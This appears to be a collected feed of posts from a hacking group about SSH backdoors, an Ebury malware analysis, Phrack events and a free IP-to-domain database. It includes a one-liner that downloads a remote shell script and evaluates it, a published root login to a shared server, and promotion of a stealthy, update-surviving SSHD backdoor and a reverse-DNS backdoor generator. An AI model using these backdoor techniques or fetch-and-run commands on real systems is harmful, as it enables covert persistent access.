@usbee trough your donations ❤️

@elithebearded
Yes. Wildcards may help to hide them a bit longer. We find sub domains by various methods. CT stream is one but also searching other places…or user feedback:

@fwaggle on my Ubuntu 22.0 and 24.0 the ed25519 host public key is not in PEM but in the <type> <key> format (no <comment> section).

What distro uses PEM? I can try to convert it to the type-format and see if the daemon blindly accepts it.

@freddy it’s sourced by many methods, CT stream is one of the big data inputs (but also where most of the rubbish comes from - which we try to filter out before adding to the database).

THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org

All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.

Updated monthly.

Try: curl https://ip.thc.org/1.1.1.1

Raw data: https://ip.thc.org/docs/bulk-data-access

(The fine work of messede 👌)

What does everyone think? Need feedback before release tomorrow :)

@lp0_on_fire it will work fine without systemctl. Any way to restart the sshd will work. either by waiting for a reboot or send a SIGTERM.

@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag).

Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag).

Please explain if I got this wrong.

Can anyone test my *SMALLEST* SSHD backdoor?

- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.

Just SSHD trickery.

Source at https://thc.org/tips

Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷

More: https://thc.org/404

<stealth> we had joy we had fun we had a rootshell on a sun.

Ebury Version 1.8.2.e6

Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.

{eval,"$({curl,-SsfL,https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh})"}

### hackshell now detects Ebury ###

EBury SSHD backdoor?? on 400,000 hosts?

Let's fuck around and find out. (Why +s on the .so file???)

Dissect, understand & ridicule. Join the group effort at https://thc.org/ops or SSH straight into the server and check ~/ebury:

ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')

INTERVIEW of "MB" WhereWarlocksStayUpLate:

https://wherewarlocksstayuplate.com/interview/mohammed-bagha/

You have inspired many. We are fans:⚡️🌊🎠

https://wherewarlocksstayuplate.com/interview/mohammed-bagha/

🇩🇪 German speaking only: THC member and @phrack staff on @heiseonline about Phrack's 40th, hacking and life in general.

Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:

https://c-skills.blogspot.com

Friend of ours is testing his PoC to DISABLE XMR mining pools.

Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).

Looking for more WALLETs: https://wallet.hellknight.xyz/walletinfo1.php

Please help and save a baby seal.

PHONY AWARD ceremony at the PHRACK PARTY at @why2025camp hosted by @Emerson @thc and tmp.out

VOTE (by shouting) for the “Biggest Security Facepalm” and more. Legends like Hegseth and Crowdstrike have been nominated and informed.

Winning prize is the privilege to be trolled by us and pay for phrack's next print release :>

PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72

Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").

May want to discuss this with your therapist. 🤷‍♂️

https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/

Generate your own python-implant of a reverse DNS backdoor. https://thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.